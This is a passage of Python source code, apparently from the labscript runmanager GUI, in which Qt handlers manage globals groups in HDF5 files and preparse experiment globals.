# If multiple selected, show 'delete n groups?' message. Otherwise,
# pass confirm=True to self.delete_group so it can show the regular
# message.
confirm_multiple = (len(name_items) > 1)
if confirm_multiple:
if not question_dialog("Delete %d groups?" % len(name_items)):
return
for item in name_items:
globals_file = item.parent().text()
group_name = item.text()
self.delete_group(globals_file, group_name, confirm=not confirm_multiple)
def on_groups_open_selected_triggered(self):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is not None]
# Make things a bit faster by acquiring network only locks on all the
# files we're dealing with. That way all the open and close
# operations will be faster.
filenames = set(item.parent().text() for item in name_items)
file_locks = [labscript_utils.h5_lock.NetworkOnlyLock(filename) for filename in filenames]
with nested(*file_locks):
for item in name_items:
globals_file = item.parent().text()
group_name = item.text()
if (globals_file, group_name) not in self.currently_open_groups:
self.open_group(globals_file, group_name, trigger_preparse=False)
if name_items:
self.globals_changed()
def on_groups_close_selected_groups_triggered(self):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is not None]
for item in name_items:
globals_file = item.parent().text()
group_name = item.text()
if (globals_file, group_name) in self.currently_open_groups:
self.close_group(globals_file, group_name)
def on_groups_close_selected_files_triggered(self):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is None]
child_openclose_items = [item.child(i, self.GROUPS_COL_OPENCLOSE)
for item in name_items
for i in range(item.rowCount())]
child_is_open = [child_item.data(self.GROUPS_ROLE_GROUP_IS_OPEN)
for child_item in child_openclose_items]
if any(child_is_open):
if not question_dialog('Close %d file(s)? This will close %d currently open group(s).' %
(len(name_items), child_is_open.count(True))):
return
for item in name_items:
globals_file = item.text()
self.close_globals_file(globals_file, confirm=False)
def on_open_globals_file_clicked(self):
globals_file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select globals file',
self.last_opened_globals_folder,
"HDF5 files (*.h5)")
if type(globals_file) is tuple:
globals_file, _ = globals_file
if not globals_file:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
globals_file = os.path.abspath(globals_file)
if not os.path.isfile(globals_file):
error_dialog("No such file %s." % globals_file)
return
# Save the containing folder for use next time we open the dialog box:
self.last_opened_globals_folder = os.path.dirname(globals_file)
# Open the file:
self.open_globals_file(globals_file)
def on_new_globals_file_clicked(self):
globals_file = QtWidgets.QFileDialog.getSaveFileName(self.ui,
'Create new globals file',
self.last_opened_globals_folder,
"HDF5 files (*.h5)")
if type(globals_file) is tuple:
globals_file, _ = globals_file
if not globals_file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
globals_file = os.path.abspath(globals_file)
# Save the containing folder for use next time we open the dialog box:
self.last_opened_globals_folder = os.path.dirname(globals_file)
# Create the new file and open it:
runmanager.new_globals_file(globals_file)
self.open_globals_file(globals_file)
def on_diff_globals_file_clicked(self):
globals_file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select globals file to compare',
self.last_opened_globals_folder,
"HDF5 files (*.h5)")
if type(globals_file) is tuple:
globals_file, _ = globals_file
if not globals_file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
globals_file = os.path.abspath(globals_file)
# Get runmanager's globals
active_groups = self.get_active_groups()
if active_groups is None:
# Invalid group selection
return
# Get file's globals groups
other_groups = runmanager.get_all_groups(globals_file)
# Display the output tab so the user can see the output:
self.ui.tabWidget.setCurrentWidget(self.ui.tab_output)
self.output_box.output('Globals diff with:\n%s\n\n' % globals_file)
# Do the globals diff
globals_diff_table = runmanager.globals_diff_groups(active_groups, other_groups)
self.output_box.output(globals_diff_table)
self.output_box.output('Ready.\n\n')
def on_treeView_groups_leftClicked(self, index):
"""Here we respond to user clicks on the treeview. We do the following:
- If the user clicks on the <click to add group> dummy row, we go into
edit mode on it so they can enter the name of the new group they
want.
- If the user clicks on the icon to open or close a globals file or a
group, we call the appropriate open and close methods and update the
open/close data role on the model.
- If the user clicks delete on a globals group, we call a delete
method, which deletes it after confirmation, and closes it if it was
open.
"""
if qapplication.keyboardModifiers() != QtCore.Qt.NoModifier:
# Only handle mouseclicks with no keyboard modifiers.
return
item = self.groups_model.itemFromIndex(index)
# The 'name' item in the same row:
name_index = index.sibling(index.row(), self.GROUPS_COL_NAME)
name_item = self.groups_model.itemFromIndex(name_index)
# The parent item, None if there is no parent:
parent_item = item.parent()
# What kind of row did the user click on?
# A globals file, a group, or a 'click to add group' row?
if item.data(self.GROUPS_ROLE_IS_DUMMY_ROW):
# They clicked on an 'add new group' row. Enter editing
# mode on the name item so they can enter a name for
# the new group:
self.ui.treeView_groups.setCurrentIndex(name_index)
self.ui.treeView_groups.edit(name_index)
if item.column() == self.GROUPS_COL_ACTIVE:
# They clicked on the active column. Toggle the checkbox. We do
# this manually because setting the item checkable means the model
# changes before we catch the mouse click. This is a pain because
# we want the ensuing sorting (if the user is sorting by the
# enabled column) to keep the the selection. If the user only
# selected the column by clicking on it, then the sort happens
# before they selected it, and the resort happens without a visual
# indication of where the item went, because it never got
# selected.
state = item.checkState()
if state in (QtCore.Qt.Unchecked, QtCore.Qt.PartiallyChecked):
item.setCheckState(QtCore.Qt.Checked)
elif state == QtCore.Qt.Checked:
item.setCheckState(QtCore.Qt.Unchecked)
else:
raise AssertionError('Invalid Check state')
# If this changed the sort order, ensure the item is still visible:
scroll_treeview_to_row_if_current(self.ui.treeView_groups, item)
elif parent_item is None:
# They clicked on a globals file row.
globals_file = name_item.text()
# What column did they click on?
if item.column() == self.GROUPS_COL_OPENCLOSE:
# They clicked the close button. Close the file:
self.close_globals_file(globals_file)
else:
# They clicked on a globals group row.
globals_file = parent_item.text()
group_name = name_item.text()
# What column did they click on?
if item.column() == self.GROUPS_COL_DELETE:
# They clicked the delete button. Delete the group:
self.delete_group(globals_file, group_name, confirm=True)
elif item.column() == self.GROUPS_COL_OPENCLOSE:
# They clicked the open/close button. Which is it, open or close?
group_is_open = item.data(self.GROUPS_ROLE_GROUP_IS_OPEN)
if group_is_open:
self.close_group(globals_file, group_name)
else:
self.open_group(globals_file, group_name)
def on_treeView_groups_doubleLeftClicked(self, index):
item = self.groups_model.itemFromIndex(index)
# The parent item, None if there is no parent:
parent_item = item.parent()
if item.data(self.GROUPS_ROLE_IS_DUMMY_ROW):
return
elif parent_item and item.column() == self.GROUPS_COL_NAME:
# it's a group name item. What's the group and file name?
globals_file = parent_item.text()
group_name = item.text()
if (globals_file, group_name) not in self.currently_open_groups:
self.open_group(globals_file, group_name)
# Focus the tab:
group_tab = self.currently_open_groups[globals_file, group_name]
for i in range(self.ui.tabWidget.count()):
if self.ui.tabWidget.widget(i) is group_tab.ui:
self.ui.tabWidget.setCurrentIndex(i)
break
def on_groups_model_item_changed(self, item):
"""This function is for responding to data changes in the model. The
methods for responding to changes different columns do different
things. Mostly they make other data changes for model consistency, but
also group creation and renaming is handled in response to changes to
the 'name' column. When we change things elsewhere, we prefer to only
change one thing, and the rest of the changes are triggered here. So
here we do the following:
Be careful not to recurse unsafely into this method - changing
something that itself triggers further changes is fine so long as they
peter out and don't get stuck in a loop. If recursion needs to be
stopped, one can disconnect the signal temporarily with the context
manager self.groups_model_item_changed_disconnected. But use this
sparingly, otherwise there's the risk that some required data updates
will be forgotten about and won't happen.
"""
if item.column() == self.GROUPS_COL_NAME:
self.on_groups_model_name_changed(item)
elif item.column() == self.GROUPS_COL_ACTIVE:
self.on_groups_model_active_changed(item)
elif item.column() == self.GROUPS_COL_OPENCLOSE:
self.on_groups_model_openclose_changed(item)
def on_groups_model_name_changed(self, item):
"""Handles group renaming and creation of new groups due to the user
editing the <click to add group> item"""
parent_item = item.parent()
# File rows are supposed to be uneditable, but just to be sure we have
# a group row:
assert parent_item is not None
if item.data(self.GROUPS_ROLE_IS_DUMMY_ROW):
item_text = item.text()
if item_text != self.GROUPS_DUMMY_ROW_TEXT:
# The user has made a new globals group by editing the <click
# to add group> item.
globals_file = parent_item.text()
group_name = item_text
self.new_group(globals_file, group_name)
else:
# User has renamed a globals group.
new_group_name = item.text()
previous_group_name = item.data(self.GROUPS_ROLE_PREVIOUS_NAME)
# Ensure it truly is a name change, and not something else about
# the item changing:
if new_group_name != previous_group_name:
globals_file = parent_item.text()
self.rename_group(globals_file, previous_group_name, new_group_name)
def on_groups_model_active_changed(self, item):
"""Sets the sort data for the item in response to its check state
changing. Also, if this is the first time this function has been
called on the stack, that is, the change was initiated externally
instead of via recursion from this function itself, then set the check
state of other items for consistency. This entails checking/unchecking
all group rows in response to the file row's check state changing, or
changing the file row's check state to reflect the check state of the
child group rows. That's why we need to keep track of the recursion
depth - so that those changes we make don't in turn cause further
changes. But we don't disconnect the on_changed signal altogether,
because we still want to do the update of the sort data, and anything
else that might be added in future."""
self.on_groups_model_active_changed_recursion_depth += 1
try:
check_state = item.checkState()
# Ensure sort data matches active state:
item.setData(check_state, self.GROUPS_ROLE_SORT_DATA)
if self.on_groups_model_active_changed_recursion_depth > 1:
# Prevent all below code from running in response to data changes
# initiated from within this method itself. The code above this
# check still runs in response to all changes.
return
parent_item = item.parent()
if parent_item is not None:
# A 'group active' checkbox changed due to external action (not from this method itself).
# Update the parent file checkbox to reflect the state of its children
children = [parent_item.child(i, self.GROUPS_COL_ACTIVE) for i in range(parent_item.rowCount())]
child_states = [child.checkState() for child in children
if not child.data(self.GROUPS_ROLE_IS_DUMMY_ROW)]
parent_active_index = parent_item.index().sibling(parent_item.index().row(), self.GROUPS_COL_ACTIVE)
parent_active_item = self.groups_model.itemFromIndex(parent_active_index)
if all(state == QtCore.Qt.Checked for state in child_states):
parent_active_item.setCheckState(QtCore.Qt.Checked)
elif all(state == QtCore.Qt.Unchecked for state in child_states):
parent_active_item.setCheckState(QtCore.Qt.Unchecked)
else:
parent_active_item.setCheckState(QtCore.Qt.PartiallyChecked)
else:
# A 'file active' checkbox changed due to external action (not from this method itself).
# Update the check state of all children to match.
name_index = item.index().sibling(item.index().row(), self.GROUPS_COL_NAME)
name_item = self.groups_model.itemFromIndex(name_index)
checkstate = item.checkState()
children = [name_item.child(i, self.GROUPS_COL_ACTIVE) for i in range(name_item.rowCount())]
for child in children:
if not child.data(self.GROUPS_ROLE_IS_DUMMY_ROW):
child.setCheckState(checkstate)
finally:
self.on_groups_model_active_changed_recursion_depth -= 1
if self.on_groups_model_active_changed_recursion_depth == 0:
self.do_model_sort()
# Trigger a preparse to occur:
self.globals_changed()
def on_groups_model_openclose_changed(self, item):
"""Sets item sort data and icon in response to the open/close state of a group
changing."""
parent_item = item.parent()
# The open/close state of a globals group changed. It is definitely a
# group, not a file, as the open/close state of a file shouldn't be
# changing.
assert parent_item is not None # Just to be sure.
# Ensure the sort data matches the open/close state:
group_is_open = item.data(self.GROUPS_ROLE_GROUP_IS_OPEN)
item.setData(group_is_open, self.GROUPS_ROLE_SORT_DATA)
# Set the appropriate icon and tooltip. Changing the icon causes
# itemChanged to be emitted, even if it the same icon, and even if we
# were to use the same QIcon instance. So to avoid infinite recursion
# we temporarily disconnect the signal whilst we set the icons.
with self.groups_model_item_changed_disconnected:
if group_is_open:
item.setIcon(QtGui.QIcon(':qtutils/fugue/cross'))
item.setToolTip('Close globals group.')
else:
item.setIcon(QtGui.QIcon(':qtutils/fugue/plus'))
item.setToolTip('Load globals group into runmanager.')
self.do_model_sort()
# If this changed the sort order, ensure the item is still visible:
scroll_treeview_to_row_if_current(self.ui.treeView_groups, item)
@inmain_decorator()
def get_default_output_folder(self):
"""Returns what the default output folder would be right now, based on
the current date and selected labscript file. Returns empty string if
no labscript file is selected. Does not create the default output
folder, does not check if it exists."""
current_day_folder_suffix = time.strftime(self.output_folder_format)
current_labscript_file = self.ui.lineEdit_labscript_file.text()
if not current_labscript_file:
return ''
current_labscript_basename = os.path.splitext(os.path.basename(current_labscript_file))[0]
default_output_folder = os.path.join(self.experiment_shot_storage,
current_labscript_basename, current_day_folder_suffix)
default_output_folder = os.path.normpath(default_output_folder)
return default_output_folder
def rollover_shot_output_folder(self):
"""Runs in a thread, checking once a second if it is a new day or the
labscript file has changed. If it is or has, sets the default folder
in which compiled shots will be put. Does not create the folder if it
does not already exists, this will be done at compile-time. Will run
immediately without waiting a full second if the threading.Event
self.output_folder_update_required is set() from anywhere."""
previous_default_output_folder = self.get_default_output_folder()
while True:
# Wait up to one second, shorter if the Event() gets set() by someone:
self.output_folder_update_required.wait(1)
self.output_folder_update_required.clear()
previous_default_output_folder = self.check_output_folder_update(previous_default_output_folder)
@inmain_decorator()
def check_output_folder_update(self, previous_default_output_folder):
"""Do a single check of whether the output folder needs updating. This
is implemented as a separate function to the above loop so that the
whole check happens at once in the Qt main thread and hence is atomic
and can't be interfered with by other Qt calls in the program."""
current_default_output_folder = self.get_default_output_folder()
if current_default_output_folder is None:
# No labscript file selected:
return previous_default_output_folder
currently_selected_output_folder = self.ui.lineEdit_shot_output_folder.text()
if current_default_output_folder != previous_default_output_folder:
# It's a new day, or a new labscript file.
# Is the user using default folders?
if currently_selected_output_folder == previous_default_output_folder:
# Yes they are. In that case, update to use the new folder:
self.ui.lineEdit_shot_output_folder.setText(current_default_output_folder)
return current_default_output_folder
return previous_default_output_folder
@inmain_decorator()
def globals_changed(self):
"""Called from either self or a GroupTab to inform runmanager that
something about globals has changed, and that they need parsing
again"""
self.ui.pushButton_engage.setEnabled(False)
QtCore.QTimer.singleShot(1,self.preparse_globals_required.set)
def update_axes_indentation(self):
for i in range(self.axes_model.rowCount()):
item = self.axes_model.item(i, self.AXES_COL_NAME)
text = item.text().lstrip()
text = ' '*i + text
item.setText(text)
@inmain_decorator() # Is called by preparser thread
def update_axes_tab(self, expansions, dimensions):
# get set of expansions
expansion_list = []
for global_name, expansion in expansions.items():
if expansion:
if expansion == 'outer':
expansion_list.append('outer '+global_name)
else:
expansion_list.append('zip '+expansion)
expansion_list = set(expansion_list)
# find items to delete
for i in reversed(range(self.axes_model.rowCount())):
item = self.axes_model.item(i, self.AXES_COL_NAME)
name = item.data(self.AXES_ROLE_NAME)
if name not in expansion_list:
item = self.axes_model.takeRow(i)
del item
else:
length_item = self.axes_model.item(i, self.AXES_COL_LENGTH)
if name in dimensions:
length_item.setText("{}".format(dimensions[name]))
else:
length_item.setText('Unknown')
# remove from expansions list so we don't add it again
expansion_list.remove(name)
# add new rows
for expansion_name in expansion_list:
shuffle = self.ui.pushButton_shuffle.checkState() != QtCore.Qt.Unchecked
self.add_item_to_axes_model(expansion_name, shuffle, dimensions)
self.update_axes_indentation()
def add_item_to_axes_model(self, expansion_name, shuffle, dimensions = None):
if dimensions is None:
dimensions = {}
items = []
expansion_type, name = expansion_name.split()
name_item = QtGui.QStandardItem(name)
name_item.setData(expansion_name, self.AXES_ROLE_NAME)
if expansion_type == 'outer':
name_item.setIcon(QtGui.QIcon(':qtutils/custom/outer'))
else:
name_item.setIcon(QtGui.QIcon(':qtutils/custom/zip'))
items.append(name_item)
length = 'Unknown'
if expansion_name in dimensions:
length = "{}".format(dimensions[expansion_name])
length_item = QtGui.QStandardItem(length)
items.append(length_item)
shuffle_item = QtGui.QStandardItem()
shuffle_item.setCheckable(True)
shuffle_item.setCheckState(QtCore.Qt.Checked if shuffle else QtCore.Qt.Unchecked)
items.append(shuffle_item)
self.axes_model.appendRow(items)
@inmain_decorator() # Is called by preparser thread
def update_tabs_parsing_indication(self, active_groups, sequence_globals, evaled_globals, n_shots):
for group_tab in self.currently_open_groups.values():
group_tab.update_parse_indication(active_groups, sequence_globals, evaled_globals)
self.ui.pushButton_engage.setEnabled(True)
if n_shots == 1:
n_shots_string = '(1 shot)'
else:
n_shots_string = '({} shots)'.format(n_shots)
self.ui.pushButton_engage.setText('Engage {}'.format(n_shots_string))
def preparse_globals(self):
active_groups = self.get_active_groups()
if active_groups is None:
# There was an error, get_active_groups has already shown
# it to the user.
return
# Expansion mode is automatically updated when the global's
# type changes. If this occurs, we will have to parse again to
# include the change:
while True:
results = self.parse_globals(active_groups, raise_exceptions=False, expand_globals=False, return_dimensions = True)
sequence_globals, shots, evaled_globals, global_hierarchy, expansions, dimensions = results
n_shots = len(shots)
expansions_changed = self.guess_expansion_modes(
active_groups, evaled_globals, global_hierarchy, expansions)
if not expansions_changed:
# Now expand globals while parsing to calculate the number of shots.
# this must only be done after the expansion type guessing has been updated to avoid exceptions
# when changing a zip group from a list to a single value
results = self.parse_globals(active_groups, raise_exceptions=False, expand_globals=True, return_dimensions = True)
sequence_globals, shots, evaled_globals, global_hierarchy, expansions, dimensions = results
n_shots = len(shots)
break
self.update_tabs_parsing_indication(active_groups, sequence_globals, evaled_globals, n_shots)
self.update_axes_tab(expansions, dimensions)
def preparse_globals_loop(self):
"""Runs in a thread, waiting on a threading.Event that tells us when
some globals have changed, and calls parse_globals to evaluate them
all before feeding the results back to the relevant tabs to be
displayed."""
while True:
try:
# Wait until we're needed:
self.preparse_globals_required.wait()
self.preparse_globals_required.clear()
# Do some work:
self.preparse_globals()
except Exception:
# Raise the error, but keep going so we don't take down the
# whole thread if there is a bug.
exc_info = sys.exc_info()
zprocess.raise_exception_in_thread(exc_info)
continue
def get_group_item_by_name(self, globals_file, group_name, column, previous_name=None):
"""Returns an item from the row representing a globals group in the
groups model. Which item is returned is set by the column argument."""
parent_item = self.groups_model.findItems(globals_file, column=self.GROUPS_COL_NAME)[0]
possible_name_items = self.groups_model.findItems(group_name, QtCore.Qt.MatchRecursive,
column=self.GROUPS_COL_NAME)
# Don't accidentally match on other groups or files with the same name
# as this group:
possible_name_items = [item for item in possible_name_items if item.parent() == parent_item]
if previous_name is not None:
# Also filter by previous name, useful for telling rows apart when
# a rename is in progress and two rows may temporarily contain the
# same name (though the rename code with throw an error and revert
# it).
possible_name_items = [item for item in possible_name_items
if item.data(self.GROUPS_ROLE_PREVIOUS_NAME) == previous_name]
elif group_name != self.GROUPS_DUMMY_ROW_TEXT:
# Don't return the dummy item unless they asked for it explicitly
# - if a new group is being created, its name might be
# simultaneously present in its own row and the dummy row too.
possible_name_items = [item for item in possible_name_items
if not item.data(self.GROUPS_ROLE_IS_DUMMY_ROW)]
if len(possible_name_items) > 1:
raise LookupError('Multiple items found')
elif not possible_name_items:
raise LookupError('No item found')
name_item = possible_name_items[0]
name_index = name_item.index()
# Found the name item, get the sibling item for the column requested:
item_index = name_index.sibling(name_index.row(), column)
item = self.groups_model.itemFromIndex(item_index)
return item
def do_model_sort(self):
header = self.ui.treeView_groups.header()
sort_column = header.sortIndicatorSection()
sort_order = header.sortIndicatorOrder()
self.ui.treeView_groups.sortByColumn(sort_column, sort_order)
@inmain_decorator() # Can be called from a non-main thread
def get_active_groups(self):
"""Returns active groups in the format {group_name: globals_file}.
Displays an error dialog and returns None if multiple groups of the
same name are selected, this is invalid - selected groups must be
uniquely named."""
active_groups = {}
for i in range(self.groups_model.rowCount()):
file_name_item = self.groups_model.item(i, self.GROUPS_COL_NAME)
for j in range(file_name_item.rowCount()):
group_name_item = file_name_item.child(j, self.GROUPS_COL_NAME)
group_active_item = file_name_item.child(j, self.GROUPS_COL_ACTIVE)
if group_active_item.checkState() == QtCore.Qt.Checked:
group_name = group_name_item.text()
globals_file = file_name_item.text()
if group_name in active_groups:
error_dialog('There are two active groups named %s. ' % group_name +
'Active groups must have unique names to be used together.')
return
active_groups[group_name] = globals_file
return active_groups
def open_globals_file(self, globals_file):
# Do nothing if this file is already open:
if self.groups_model.findItems(globals_file, column=self.GROUPS_COL_NAME):
return
# Get the groups:
groups = runmanager.get_grouplist(globals_file)
# Add the parent row:
file_name_item = QtGui.QStandardItem(globals_file)
file_name_item.setEditable(False)
file_name_item.setToolTip(globals_file)
# Sort column by name:
file_name_item.setData(globals_file, self.GROUPS_ROLE_SORT_DATA)
file_active_item = QtGui.QStandardItem()
file_active_item.setCheckState(QtCore.Qt.Unchecked)
# Sort column by CheckState - must keep this updated when checkstate changes:
file_active_item.setData(QtCore.Qt.Unchecked, self.GROUPS_ROLE_SORT_DATA)
file_active_item.setEditable(False)
file_active_item.setToolTip('Check to set all the file\'s groups as active.')
file_delete_item = QtGui.QStandardItem() # Blank, only groups have a delete button
file_delete_item.setEditable(False)
# Must be set to something so that the dummy row doesn't get sorted first:
file_delete_item.setData(False, self.GROUPS_ROLE_SORT_DATA)
file_close_item = QtGui.QStandardItem()
file_close_item.setIcon(QtGui.QIcon(':qtutils/fugue/cross'))
file_close_item.setEditable(False)
file_close_item.setToolTip('Close globals file.')
self.groups_model.appendRow([file_name_item, file_active_item, file_delete_item, file_close_item])
# Add the groups as children:
for group_name in groups:
row = self.make_group_row(group_name)
file_name_item.appendRow(row)
# Finally, add the <Click to add group> row at the bottom:
dummy_name_item = QtGui.QStandardItem(self.GROUPS_DUMMY_ROW_TEXT)
dummy_name_item.setToolTip('Click to add group')
# This lets later code know that this row does
# not correspond to an actual globals group:
dummy_name_item.setData(True, self.GROUPS_ROLE_IS_DUMMY_ROW)
dummy_name_item.setData(self.GROUPS_DUMMY_ROW_TEXT, self.GROUPS_ROLE_PREVIOUS_NAME)
dummy_name_item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsEditable) # Clears the 'selectable' flag
dummy_active_item = QtGui.QStandardItem()
dummy_active_item.setData(True, self.GROUPS_ROLE_IS_DUMMY_ROW)
dummy_active_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_delete_item = QtGui.QStandardItem()
dummy_delete_item.setData(True, self.GROUPS_ROLE_IS_DUMMY_ROW)
dummy_delete_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_open_close_item = QtGui.QStandardItem()
dummy_open_close_item.setData(True, self.GROUPS_ROLE_IS_DUMMY_ROW)
dummy_open_close_item.setFlags(QtCore.Qt.NoItemFlags)
# Not setting anything as the above items' sort role has the effect of
# ensuring this row is always sorted to the end of the list, without
# us having to implement any custom sorting methods or subclassing
# anything, yay.
file_name_item.appendRow([dummy_name_item, dummy_active_item, dummy_delete_item, dummy_open_close_item])
# Expand the child items to be visible:
self.ui.treeView_groups.setExpanded(file_name_item.index(), True)
self.globals_changed()
self.do_model_sort()
# If this changed the sort order, ensure the file item is visible:
scroll_treeview_to_row_if_current(self.ui.treeView_groups, file_name_item)
def make_group_row(self, group_name):
"""Returns a new row representing one group in the groups tab, ready to be
inserted into the model."""
group_name_item = QtGui.QStandardItem(group_name)
# We keep the previous name around so that we can detect what changed:
group_name_item.setData(group_name, self.GROUPS_ROLE_PREVIOUS_NAME)
# Sort column by name:
group_name_item.setData(group_name, self.GROUPS_ROLE_SORT_DATA)
group_active_item = QtGui.QStandardItem()
group_active_item.setCheckState(QtCore.Qt.Unchecked)
# Sort column by CheckState - must keep this updated whenever the
# checkstate changes:
group_active_item.setData(QtCore.Qt.Unchecked, self.GROUPS_ROLE_SORT_DATA)
group_active_item.setEditable(False)
group_active_item.setToolTip(
'Whether or not the globals within this group should be used by runmanager for compilation.')
group_delete_item = QtGui.QStandardItem()
group_delete_item.setIcon(QtGui.QIcon(':qtutils/fugue/minus'))
# Must be set to something so that the dummy row doesn't get sorted first:
group_delete_item.setData(False, self.GROUPS_ROLE_SORT_DATA)
group_delete_item.setEditable(False)
group_delete_item.setToolTip('Delete globals group from file.')
group_open_close_item = QtGui.QStandardItem()
group_open_close_item.setIcon(QtGui.QIcon(':qtutils/fugue/plus'))
group_open_close_item.setData(False, self.GROUPS_ROLE_GROUP_IS_OPEN)
# Sort column by whether group is open - must keep this manually
# updated when the state changes:
group_open_close_item.setData(False, self.GROUPS_ROLE_SORT_DATA)
group_open_close_item.setEditable(False)
group_open_close_item.setToolTip('Load globals group into runmananger.')
row = [group_name_item, group_active_item, group_delete_item, group_open_close_item]
return row
def close_globals_file(self, globals_file, confirm=True):
item = self.groups_model.findItems(globals_file, column=self.GROUPS_COL_NAME)[0]
# Close any open groups in this globals file:
child_name_items = [item.child(i, self.GROUPS_COL_NAME) for i in range(item.rowCount())]
child_openclose_items = [item.child(i, self.GROUPS_COL_OPENCLOSE) for i in range(item.rowCount())]
child_is_open = [child_item.data(self.GROUPS_ROLE_GROUP_IS_OPEN)
for child_item in child_openclose_items]
if confirm and any(child_is_open):
if not question_dialog('Close %s? This will close %d currently open group(s).' %
(globals_file, child_is_open.count(True))):
return
to_close = [name_item for name_item, is_open in zip(child_name_items, child_is_open) if is_open]
for name_item in to_close:
group_name = name_item.text()
self.close_group(globals_file, group_name)
# Remove the globals file from the model:
self.groups_model.removeRow(item.row())
self.globals_changed()
def copy_group(self, source_globals_file, source_group_name, dest_globals_file=None, delete_source_group=False):
"""This function copys a group of globals with the name source_group_name from the file
source_globals_file to a new file dest_globals_file. If delete_source_group is True
the source group is deleted after copying"""
if delete_source_group and source_globals_file == dest_globals_file:
return
try:
dest_group_name = runmanager.copy_group(source_globals_file, source_group_name, dest_globals_file, delete_source_group)
except Exception as e:
error_dialog(str(e))
else:
# Insert the newly created globals group into the model, as a
# child row of the new globals file.
if dest_globals_file is None:
dest_globals_file = source_globals_file
# find the new groups parent row by filepath
for index in range(self.groups_model.rowCount()):
if self.groups_model.item(index, self.GROUPS_COL_NAME).text() == dest_globals_file:
parent_row = self.groups_model.item(index)
break
last_index = parent_row.rowCount()
# Insert it as the row before the last (dummy) row:
group_row = self.make_group_row(dest_group_name)
parent_row.insertRow(last_index - 1, group_row)
self.do_model_sort()
# Open the group
self.open_group(dest_globals_file, dest_group_name)
name_item = group_row[self.GROUPS_COL_NAME]
self.globals_changed()
self.ui.treeView_groups.setCurrentIndex(name_item.index())
# delete original
if delete_source_group:
self.delete_group(source_globals_file, source_group_name, confirm=False)
# If this changed the sort order, ensure the group item is still visible:
scroll_treeview_to_row_if_current(self.ui.treeView_groups, name_item)
def new_group(self, globals_file, group_name):
item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_NAME,
previous_name=self.GROUPS_DUMMY_ROW_TEXT)
try:
runmanager.new_group(globals_file, group_name)
except Exception as e:
error_dialog(str(e))
else:
# Insert the newly created globals group into the model, as a
# child row of the globals file it belong to.
group_row = self.make_group_row(group_name)
last_index = item.parent().rowCount()
# Insert it as the row before the last (dummy) row:
item.parent().insertRow(last_index - 1, group_row)
self.do_model_sort()
# Open the group and mark it active:
self.open_group(globals_file, group_name)
active_item = group_row[self.GROUPS_COL_ACTIVE]
name_item = group_row[self.GROUPS_COL_NAME]
active_item.setCheckState(QtCore.Qt.Checked)
self.globals_changed()
self.ui.treeView_groups.setCurrentIndex(name_item.index())
# If this changed the sort order, ensure the group item is still visible:
scroll_treeview_to_row_if_current(self.ui.treeView_groups, name_item)
finally:
# Set the dummy row's text back ready for another group to be created:
item.setText(self.GROUPS_DUMMY_ROW_TEXT)
def open_group(self, globals_file, group_name, trigger_preparse=True):
assert (globals_file, group_name) not in self.currently_open_groups # sanity check
group_tab = GroupTab(self.ui.tabWidget, globals_file, group_name)
self.currently_open_groups[globals_file, group_name] = group_tab
# Set the open/close state in the groups_model. itemChanged will be
# emitted and self.on_groups_model_item_changed will handle updating
# the other data roles, icons etc:
openclose_item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_OPENCLOSE)
openclose_item.setData(True, self.GROUPS_ROLE_GROUP_IS_OPEN)
# Trigger a preparse to occur in light of this. Calling code can
# disable this so that multiple groups can be opened at once without
# triggering a preparse. If they do so, they should call
# self.globals_changed() themselves.
if trigger_preparse:
self.globals_changed()
def rename_group(self, globals_file, previous_group_name, new_group_name):
item = self.get_group_item_by_name(globals_file, new_group_name, self.GROUPS_COL_NAME,
previous_name=previous_group_name)
try:
runmanager.rename_group(globals_file, previous_group_name, new_group_name)
except Exception as e:
error_dialog(str(e))
# Set the item text back to the old name, since the rename failed:
item.setText(previous_group_name)
else:
item.setData(new_group_name, self.GROUPS_ROLE_PREVIOUS_NAME)
item.setData(new_group_name, self.GROUPS_ROLE_SORT_DATA)
self.do_model_sort()
# If this changed the sort order, ensure the group item is still visible:
scroll_treeview_to_row_if_current(self.ui.treeView_groups, item)
group_tab = self.currently_open_groups.pop((globals_file, previous_group_name), None)
if group_tab is not None:
# Change labels and tooltips appropriately if the group is open:
group_tab.set_file_and_group_name(globals_file, new_group_name)
# Re-add it to the dictionary under the new name:
self.currently_open_groups[globals_file, new_group_name] = group_tab
def close_group(self, globals_file, group_name):
group_tab = self.currently_open_groups.pop((globals_file, group_name), None)
assert group_tab is not None # Just in case
group_tab.close()
openclose_item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_OPENCLOSE)
openclose_item.setData(False, self.GROUPS_ROLE_GROUP_IS_OPEN)
def delete_group(self, globals_file, group_name, confirm=True):
if confirm:
if not question_dialog("Delete the group '%s'?" % group_name):
return
# If the group is open, close it:
group_tab = self.currently_open_groups.get((globals_file, group_name))
if group_tab is not None:
self.close_group(globals_file, group_name)
runmanager.delete_group(globals_file, group_name)
# Find the entry for this group in self.groups_model and remove it:
name_item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_NAME)
name_item.parent().removeRow(name_item.row())
self.globals_changed()
def on_save_configuration_triggered(self):
if self.last_save_config_file is None:
self.on_save_configuration_as_triggered()
self.ui.actionSave_configuration_as.setEnabled(True)
self.ui.actionRevert_configuration.setEnabled(True)
else:
self.save_configuration(self.last_save_config_file)
def on_revert_configuration_triggered(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
